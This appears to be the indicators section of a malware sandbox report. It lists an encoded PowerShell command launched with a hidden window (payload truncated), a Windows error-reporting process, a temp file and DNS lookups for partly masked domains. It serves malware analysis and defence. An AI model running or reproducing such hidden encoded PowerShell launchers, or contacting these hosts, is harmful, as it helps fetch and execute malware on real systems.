Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABXAHAAcQBwAGEAdwBhAHQAPQAnAEEAcQBuAHAAdQB1AGYAcwB0AG0AYgB0AGYAJwA7ACQAUwBqAGcAZgBsAHoAYgB5AGoAYQAgAD0AIAAnADkANwA1ACcAOwAkAFQAZQBsAGYAZABoAGUAbgBlAGMAPQAnAFg...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1608
- %TEMP%\796104.cvr
- DNS ASK mc######.sepimarketing.com
- DNS ASK ro#####ventureclub.com
- DNS ASK aa##h.org
- DNS ASK hu#######sprc.web.illinois.edu
- DNS ASK tr########igration.mytechnode.com